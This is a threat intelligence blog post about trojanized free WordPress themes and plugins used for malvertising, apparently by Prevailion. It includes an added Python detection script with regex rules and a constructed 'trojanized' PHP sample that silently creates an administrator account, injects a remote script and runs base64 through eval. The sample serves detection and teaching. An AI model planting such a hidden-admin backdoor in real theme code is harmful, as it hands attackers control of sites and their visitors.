How PHP’s Labyrinth Weaponized WordPress Themes for Profit


New findings from Prevailion’s Tailored Intelligence team indicate the rapid expansion of a series of supply chain attacks that turn installations of the popular WordPress content management system into hosts for a malicious advertising network. More than 20,000 web servers have been identified as compromised in this campaign.

WordPress has grown to become the backbone of 60% of content management systems, comprising 34% of all websites on the internet. This widespread user base, and the ease with which a website can be personalized without any knowledge of coding, has created fertile ground for exploitation by the threat actors we have dubbed PHP’s Labyrinth.

As previously reported, the campaign abuses WordPress’ customization tools by enticing victims with trojanized copies of free themes and plugins. Once these are installed, the threat actors can not only compromise admin accounts but also inject malvertising and use that vector to deliver exploit kits; either path lets them compromise visitors of the affected websites.
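Because the trojanized themes and plugins described above ship with the malicious PHP already inside them, a first triage step on a suspect site is to grep the theme and plugin directories for the generic constructs such trojans tend to carry: obfuscated code fed into eval, silent creation of an administrator account, injection of a remote script into page output, and fetching of remote code at runtime. The script below is an added example written for this page, not Prevailion’s tooling and not the campaign’s indicators of compromise; the rules are generic heuristics, the sample PHP files are constructed for the demonstration, and the hostname example.invalid is a placeholder.

```python
"""Heuristic triage of WordPress theme/plugin PHP for trojanized code.

Added example for illustration only. The rules below are generic
heuristics for trojanized themes, not the PHP's Labyrinth campaign's
indicators, and the sample files are constructed, not real theme code.
"""
import os
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    path: str
    line: int
    rule: str
    excerpt: str


# (rule name, pattern). Each pattern targets a construct that legitimate
# theme code rarely needs but trojanized themes commonly rely on.
RULES = (
    ("obfuscated-eval",
     re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("admin-user-creation",
     re.compile(r"\bwp_(?:insert|create)_user\s*\(", re.I)),
    ("administrator-role",
     re.compile(r"['\"]role['\"]\s*=>\s*['\"]administrator['\"]", re.I)),
    ("remote-script-inject",
     re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]?https?://", re.I)),
    ("remote-fetch",
     re.compile(r"\b(?:file_get_contents|curl_init|wp_remote_get)\s*\(\s*['\"]https?://", re.I)),
)


def scan_text(path, text):
    """Return one Finding per (line, rule) hit in a PHP source string."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in RULES:
            if pattern.search(line):
                findings.append(Finding(path, lineno, rule, line.strip()[:120]))
    return findings


def scan_directory(root):
    """Walk a wp-content/themes or wp-content/plugins tree and scan every .php file."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in sorted(filenames):
            if name.lower().endswith(".php"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_text(full, fh.read()))
    return findings


# Constructed sample inputs (not real theme code).
CLEAN_FUNCTIONS_PHP = """<?php
add_action('wp_enqueue_scripts', function () {
    wp_enqueue_style('theme-style', get_stylesheet_uri());
});
"""

TROJANIZED_FUNCTIONS_PHP = """<?php
// looks like ordinary theme setup code
add_action('init', function () {
    if (!username_exists('support')) {
        wp_insert_user(['user_login' => 'support', 'user_pass' => 'x', 'role' => 'administrator']);
    }
});
add_action('wp_head', function () {
    echo '<script src="https://example.invalid/ads.js"></script>';
});
eval(base64_decode('ZWNobyAiaGkiOw=='));
"""


def demo():
    """Scan both constructed samples and return the findings keyed by label."""
    return {
        "clean": scan_text("clean/functions.php", CLEAN_FUNCTIONS_PHP),
        "trojanized": scan_text("trojan/functions.php", TROJANIZED_FUNCTIONS_PHP),
    }


if __name__ == "__main__":
    for label, findings in demo().items():
        print(f"{label}: {len(findings)} finding(s)")
        for f in findings:
            print(f"  {f.path}:{f.line} [{f.rule}] {f.excerpt}")
```

On a live site, run `scan_directory("/var/www/html/wp-content/themes")` and treat any hit as a reason to diff the theme against a copy downloaded from the official WordPress repository rather than as proof of compromise on its own; a theme that legitimately enqueues a third-party script will trip the remote-script rule, whereas an eval over base64_decode in a theme almost never has an innocent explanation.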

Prevailion has been working closely with a US federal law enforcement agency to provide new evidence on the threat actor behind this sophisticated botnet, along with the discovery of previously unreported malicious activities, including: 

  • 30 active malicious platforms serving these malicious themes and plugins
  • Newly discovered second-stage malware functions such as an anti-adblocker script and additional C2
  • Distribution of the Fallout exploit kit and malvertising adware through the Propeller Ads network (which claims to have over 100 million desktop and mobile users per day)

To learn more, read the full report on the Tailored Intelligence blog.


Copyright 2021 Prevailion, Inc. All rights reserved
